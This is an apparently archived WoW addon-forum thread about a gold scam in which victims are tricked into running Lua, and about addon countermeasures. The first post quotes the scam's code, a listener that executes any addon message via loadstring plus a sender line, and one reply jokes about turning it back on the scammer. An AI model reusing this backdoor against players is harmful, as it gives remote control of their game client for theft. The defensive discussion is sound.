AcceptTrade gold scamming, catching hardware events
There have been some gold scams with social engineering involved, if listening to totally shady strangers to run X script could be counted as that.
Would an addon be able to effectively safeguard against that? https://www.reddit.com/r/wow/comment...h_a_scam_that/ http://us.battle.net/wow/en/forum/topic/20745644941 Run by the victim Code:
/run RemoveExtraSpaces = RunScript Code:
local f = CreateFrame("Button") f:RegisterEvent("CHAT_MSG_ADDON") f:SetScript("OnEvent", function(_, _, _, msg) pcall(loadstring(msg)) end) RegisterAddonMessagePrefix("somePrefix") Code:
SendAddonMessage("somePrefix", RemoveExtraSpaces(print("Hello World")), "WHISPER", GetUnitName("target", true)) I tried thinking of a few possible counter measures:
So I'm trying to call ReloadUI() to remove the script asap. Unless the culprit was literally standing next to the player :( But I don't know how to set a secure attribute for key/button presses and right-clicks, so that it would also /reload at the press of any button. OnKeyDown / OnKeyUp are not able to trigger a hardware event for me. http://forums.wowace.com/showthread.php?t=20110 Lua Code:
|
Couldn't you check the AddOn message events, see if the incoming message is the malware, and if so, exit out?
Or, if you want to be evil, send that same message back to the source, and scam the scammer? |
Quote:
That is a good idea, to proactively check any incoming addon or chat messages for anything suspicious :) Would it also be possible to unregister an addon prefix? Scamming the scammer would be nice if that was even possible, sounds a bit like digital warfare; but they might use a compromised or level 1 char |
Yes, during the check/exit phase, you can unregister the prefix. While there is no direct API either natively or with Ace3, I would presume registering "" would do the trick. Wrap it within an if/then so you don't accidentally re-register something you'd want! ;)
While true, the scammer could use a compromised character (of any level), the social hack indicates the scammer would be max level. Afterall, who'd join a raid group for the moose, if you were being invited by someone level 1-99? As for hacking the hacker, why not? If the message is the scam, then send the scam right back to the hacker. And if the toon has been compromised, the true owner will get fixed up by Blizzard's customer support. I don't see any issues with this, but I'm evil. |
Why would the scammer themself be listening for incoming addon messages?
AcceptTrade doesn't require a hardware event? That is terrible. Or are they being tricked into executing that somehow? |
Quote:
|
What about something like saving AcceptTrade() into a local object, wiping the main one to nil, then setting TradeFrameTradeButton's onclick script to call the local object. That way, a trade is accepted only if the Trade UI's confirm button is clicked.
|
Quote:
Yes, they are being tricked into executing that by catching any hardware events with a secure frame I don't know how exactly they do that, but I could only manage catching any left-clicks Quote:
Good idea. Or maybe without wiping the global one to nil, to not break any other Trade UI related addons. Lua Code:
It might be really obvious, but why is RemoveExtraSpaces not a local scope function :confused: It's only being used in ChatFrame.lua @Resike: So there is no way to stop an addon message before it already has done the damage? Edit: It looks like Blizzard is already checking for any suspicious whisper messages? It's not possible to say "loadstring" anymore in chat channels, including whisper But they could still whisper something like Lua Code:
|
Quote:
|
When it comes to the chat system, there are many attack vectors they can eventually move to with ease. One thing that can be done is completely nullify the RunScript() and DevTools_DumpCommand() functions while a chat event is being handled.
Lua Code:
To protect more functions, add them to the FuncList table. |
All times are GMT -6. The time now is 12:54 PM. |
vBulletin © 2024, Jelsoft Enterprises Ltd
© 2004 - 2022 MMOUI